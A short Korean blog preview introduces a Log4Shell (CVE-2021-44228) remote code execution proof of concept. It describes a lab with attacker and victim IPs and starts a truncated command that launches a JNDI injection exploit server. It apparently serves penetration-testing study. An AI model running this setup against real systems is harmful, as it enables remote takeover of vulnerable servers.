log4j1 Log4shell (CVE-2021-44228) RCE POC 2021년 12월 10일 JAVA의 log4j2에서 0-day 취약점이 공개 되었습니다. 무려 RCE가 가능한 취약점이고 로그만 쌓을 수 있다면 어떤 환경에서든 공격이 가능하다는 점에서 정말 어마어마한 취약점 입니다. ㄷㄷㄷ Log4shell ? 위에서 설명한 0-day 취약점으로 CVE-2021-44228의 별칭으로 log4shell이라고 부릅니다. 해당 취약점은 log4j에서 발견되었고 공격방법 또한 쉬워서 파급력이 클 것으로 판단됩니다. 그럼 바로 테스트를 진행해 보겠습니다. PenTesting Attacker IP 192.168.20.129 Victim IP 192.168.20.130 - Attacker Server Setting java -jar JNDI-Injection-Exploit-1.0-.. 2021. 12. 14. 이전 1 다음
